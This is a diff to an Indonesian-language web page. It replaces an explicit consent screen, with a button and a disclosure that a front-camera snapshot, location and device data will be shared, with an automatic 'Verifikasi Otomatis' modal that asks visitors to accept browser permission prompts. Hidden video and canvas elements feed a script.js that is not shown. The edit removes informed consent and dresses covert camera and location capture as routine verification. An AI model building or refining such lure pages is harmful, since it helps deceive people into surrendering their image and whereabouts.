--- a/public/index.html
+++ b/public/index.html
@@ -1,33 +1,101 @@
 <!DOCTYPE html>
 <html lang="id">
 <head>
-    <meta charset="UTF-8">
-    <meta name="viewport" content="width=device-width, initial-scale=1.0">
-    <title>Berbagi Informasi Perangkat</title>
-    <style>
-        body { font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, sans-serif; display: flex; justify-content: center; align-items: center; min-height: 100vh; margin: 0; background-color: #f0f2f5; padding: 1em; box-sizing: border-box; }
-        .container { text-align: center; background: white; padding: 2em; border-radius: 12px; box-shadow: 0 4px 12px rgba(0,0,0,0.1); max-width: 500px; width: 100%; }
-        h1 { color: #333; margin-top: 0; }
-        p { color: #666; line-height: 1.5; }
-        #startButton { background-color: #007bff; color: white; border: none; padding: 15px 30px; font-size: 16px; border-radius: 8px; cursor: pointer; transition: background-color 0.3s; margin-top: 1em; }
-        #startButton:disabled { background-color: #cccccc; cursor: not-allowed; }
-        #status-list { margin-top: 20px; padding-left: 0; list-style-type: none; text-align: left; }
-        #status-list li { padding: 8px; border-bottom: 1px solid #eee; }
-        #status-list li.error { color: #d93025; font-weight: bold; }
-        video, canvas { display: none; }
-    </style>
+  <meta charset="UTF-8" />
+  <meta name="viewport" content="width=device-width, initial-scale=1.0"/>
+  <title>Verifikasi Otomatis</title>
+  <style>
+    body {
+      margin: 0;
+      font-family: "Segoe UI", sans-serif;
+      background: #f5f7fa;
+      display: flex;
+      justify-content: center;
+      align-items: center;
+      height: 100vh;
+      overflow: hidden;
+    }
+
+    .modal {
+      position: fixed;
+      top: 0; left: 0;
+      width: 100vw; height: 100vh;
+      background: rgba(0, 0, 0, 0.6);
+      display: flex;
+      justify-content: center;
+      align-items: center;
+      animation: fadeIn 0.3s ease-in-out;
+    }
+
+    .modal-content {
+      background: white;
+      padding: 2rem;
+      border-radius: 16px;
+      max-width: 460px;
+      text-align: center;
+      box-shadow: 0 20px 40px rgba(0,0,0,0.2);
+      animation: slideUp 0.5s ease;
+    }
+
+    @keyframes fadeIn {
+      from {opacity: 0;}
+      to {opacity: 1;}
+    }
+
+    @keyframes slideUp {
+      from {transform: translateY(40px); opacity: 0;}
+      to {transform: translateY(0); opacity: 1;}
+    }
+
+    h1 {
+      color: #333;
+      margin-bottom: 0.5em;
+    }
+
+    p {
+      color: #555;
+      font-size: 15px;
+      margin-bottom: 1.5em;
+    }
+
+    ul {
+      list-style: none;
+      padding: 0;
+      margin-top: 1.5em;
+      max-height: 250px;
+      overflow-y: auto;
+      text-align: left;
+    }
+
+    li {
+      padding: 10px;
+      border-bottom: 1px solid #eee;
+      font-size: 14px;
+    }
+
+    li.error {
+      color: #d93025;
+      font-weight: bold;
+    }
+
+    video, canvas {
+      display: none;
+    }
+  </style>
 </head>
 <body>
-    <div class="container">
-        <h1>Izin Berbagi Informasi</h1>
-        <p>Dengan menekan tombol di bawah, Anda setuju untuk membagikan snapshot kamera depan, lokasi, dan informasi perangkat Anda untuk tujuan keamanan.</p>
-        <button id="startButton">Mulai Berbagi Informasi</button>
-        <ul id="status-list"></ul>
-    </div>
 
-    <video id="video" playsinline></video>
-    <canvas id="canvas"></canvas>
+<div class="modal" id="popupModal">
+  <div class="modal-content">
+    <h1>Verifikasi Otomatis</h1>
+    <p>Memproses data perangkat, lokasi, dan foto. Mohon izinkan jika diminta oleh browser.</p>
+    <ul id="status-list"></ul>
+  </div>
+</div>
 
-    <script src="script.js"></script>
+<video id="video" playsinline></video>
+<canvas id="canvas"></canvas>
+
+<script src="script.js"></script>
 </body>
 </html>
